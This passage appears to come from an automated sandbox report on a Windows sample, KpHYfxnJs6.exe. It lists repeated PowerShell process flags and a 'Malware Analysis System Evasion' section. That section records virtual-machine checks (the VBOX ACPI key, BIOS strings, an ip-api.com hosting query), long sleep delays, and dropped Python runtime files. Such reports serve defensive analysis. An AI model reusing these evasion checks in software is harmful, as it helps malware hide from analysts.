              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Accept-Encoding: identity; User-Agent: python-urllib3/2.3.0
              Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\SysWOW64\getmac.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | System information queried: FirmwareTableInformation (2 entries)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (2 entries)
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3 (2 entries)
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (17 entries)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5032
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6030
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7329
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2229
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1118
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3440
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2236
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2568
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4550
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 555
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1081
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2227
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3064
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 638
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_socket.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pyd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_sqlite3.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_decimal.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_ctypes.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_queue.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\select.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_ssl.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\python311.dll
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_bz2.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\_lzma.pyd
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pyd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5316 | Thread sleep count: 5032 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6924 | Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6024 | Thread sleep count: 6030 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6900 | Thread sleep time: -8301034833169293s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076 | Thread sleep count: 350 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5740 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1744 | Thread sleep count: 7329 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1744 | Thread sleep count: 2229 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1596 | Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384 | Thread sleep count: 1118 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6856 | Thread sleep count: 3440 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5820 | Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736 | Thread sleep count: 2236 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5640 | Thread sleep count: 2568 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7684 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728 | Thread sleep count: 4550 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2720 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000 | Thread sleep count: 555 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6624 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 | Thread sleep count: 1081 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 | Thread sleep count: 2227 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5804 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2472 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6756 | Thread sleep count: 3064 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7016 | Thread sleep count: 638 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512 | Thread sleep time: -1844674407370954s >= -30000s
